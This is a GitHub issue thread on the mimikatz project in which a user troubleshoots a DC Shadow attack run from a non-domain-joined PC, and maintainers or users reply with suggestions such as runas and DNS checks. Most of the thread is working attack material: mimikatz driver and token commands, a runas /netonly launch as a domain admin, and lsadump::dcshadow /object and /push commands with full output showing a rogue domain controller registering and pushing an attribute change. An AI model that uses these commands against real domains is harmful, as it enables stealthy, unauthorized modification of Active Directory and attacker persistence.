-
Notifications
You must be signed in to change notification settings - Fork 3.8k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Can't find way to run Mimikatz in context of a domain administrator on non-domain-joined PC for DC Shadow attack #423
Comments
Uhh you try runas already?
…On Thu, Mar 16, 2023 at 15:06 rick-engle ***@***.***> wrote:
I'm looking for a way to launch mimikatz within the context of an AD
domain administrator (DA) so that if I use the token::whoami command it
shows me running in that context:
mimikatz # token::whoami
- Process Token : {0;000003e7} 2 D 1443633 TARGETDOMAIN\ADMINUSER
S-1-5-18 (04g,30p) Primary
- Thread Token : no token
The attack PC does have line of sight to a Domain Controller, but I can't
figure out how I can start mimikatz in that DA context.
Is there a way to do this?
Thanks.
—
Reply to this email directly, view it on GitHub
<#423>, or unsubscribe
<https://github.com/notifications/unsubscribe-auth/AEOE6BTG7DH4SP7ZHHWSL2TW4NXGHANCNFSM6AAAAAAV5VXKAU>
.
You are receiving this because you are subscribed to this thread.Message
ID: ***@***.***>
|
I did try that but unfortunately I get this error: |
|
Hi @gentilkiwi , That command works but doesn't seem to change the user context. If I use this it launches mimikatz OK, but the whoami still shows me in the context of the local admin account I signed into the Windows PC with:
|
The |
Ok that is good to know. I put everything together for my DC Shadow attack (which I can get working fine on a domain-joined PC) but the first mimikatz session making an attribute change never receives the sync from session #2 making the push. I did turn off the Windows firewalls on this Windows 10 PC as I did on other domain-joined machines where this worked. I guessed at the parameters I needed for the lsadump::dcshadow /object and lsadump::dcshadow /push commands to enable them to find the domain controller. This attack PC DOES have line of sight to the domain controller: Mimikatz session #1 .#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08 / \ ## /*** Benjamin DELPY
|
Are you in a virtualized environment or attached to multiple networks?
Also, have you dumped dns traffic to see what’s going on?
…On Fri, Mar 17, 2023 at 09:47 rick-engle ***@***.***> wrote:
Ok that is good to know. I put everything together for my DC Shadow attack
(which I can get working fine on a domain-joined PC) but the first mimikatz
session making an attribute change never receives the sync from session #2
<#2> making the push. I did
turn off the Windows firewalls on this Windows 10 PC as I did on other
domain-joined machines where this worked. I guessed at the parameters I
needed for the lsadump::dcshadow /object and lsadump::dcshadow /push
commands to enable them to find the domain controller. This attack PC DOES
have line of sight to the domain controller:
Mimikatz session #1 <#1>
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
/ \ ## /*** Benjamin DELPY gentilkiwi ( ***@***.*** ) \ / ##
> https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( ***@***.*** )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz # !+
[+] 'mimidrv' service already registered
[*] 'mimidrv' service already started
mimikatz # !processtoken
Token from process 0 to process 0
- from 0 will take SYSTEM token
- to 0 will take all 'cmd' and 'mimikatz' process
Token from 4/System
- to 4976/cmd.exe
- to 5704/mimikatz.exe
- to 2844/mimikatz.exe
mimikatz # lsadump::dcshadow /object:jeffl /dc:DC1.mydomain.com
/attribute:Description /value="My new cool description is swell!"
** Domain Info **
Domain: DC=toondom,DC=com
Configuration: CN=Configuration,DC=toondom,DC=com
Schema: CN=Schema,CN=Configuration,DC=toondom,DC=com
dsServiceName:
,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=toondom,DC=com
domainControllerFunctionality: 6 ( WIN2012R2 )
highestCommittedUSN: 635132
** Server Info **
Server: DC1.mydomain.com
InstanceId : {52021f09-72f2-4471-9114-9e582b9c071c}
InvocationId: {254a564c-26b5-45cc-a01a-4774f80bab1a}
Fake Server (not already registered): ATTACKER-EXT.mydomain.com
** Attributes checking **
#0: Description
** Objects **
#0: jeffl
DN:CN=JeffL,CN=Users,DC=toondom,DC=com
Description (2.5.4.13-d rev 1):
My new cool description is swell!
(4d00790020006e0065007700200063006f006f006c0020006400650073006300720069007000740069006f006e0020006900730020007300770065006c006c0021000000)
** Starting server **
BindString[0]: ncacn_ip_tcp:ATTACKER-EXT[53196]
RPC bind registered
RPC Server is waiting!
== Press Control+C to stop ==
Mimikatz session #2 <#2>
Launch with:
runas /netonly /user:mydomain.com\badadmin
"C:\Attackfolder\x64\mimikatz.exe"
mimikatz # token::whoami
- Process Token : {0;00630804} 2 L 6490326 ATTACKER-EXT\georgej
S-1-5-21-3967830162-2019074872-1635380170-1000 (12g,05p) Primary
- Thread Token : no token
mimikatz # lsadump::dcshadow /push
ERROR kull_m_net_getDC ; DsGetDcName: 1355
mimikatz # lsadump::dcshadow /push /dc:DC1.mydomain.com
** Domain Info **
Domain: DC=toondom,DC=com
Configuration: CN=Configuration,DC=toondom,DC=com
Schema: CN=Schema,CN=Configuration,DC=toondom,DC=com
dsServiceName:
,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=toondom,DC=com
domainControllerFunctionality: 6 ( WIN2012R2 )
highestCommittedUSN: 635133
** Server Info **
Server: DC1.mydomain.com
InstanceId : {52021f09-72f2-4471-9114-9e582b9c071c}
InvocationId: {254a564c-26b5-45cc-a01a-4774f80bab1a}
Fake Server (not already registered): ATTACKER-EXT.mydomain.com
** Performing Registration **
** Performing Push **
Syncing DC=toondom,DC=com
Sync Done
** Performing Unregistration **
—
Reply to this email directly, view it on GitHub
<#423 (comment)>,
or unsubscribe
<https://github.com/notifications/unsubscribe-auth/AEOE6BSZ6YYDSEXMKQTUVU3W4R2OPANCNFSM6AAAAAAV5VXKAU>
.
You are receiving this because you commented.Message ID:
***@***.***>
|
This seems like you are having network issues reading thru this, because I can't imagine this not being related to some type of network issue. |
I'm looking for a way to launch mimikatz within the context of an AD domain administrator (DA) so that if I use the token::whoami command it shows me running in that context:
mimikatz # token::whoami
The attack PC does have line of sight to a Domain Controller, but I can't figure out how I can start mimikatz in that DA context.
Is there a way to do this?
Thanks.
The text was updated successfully, but these errors were encountered: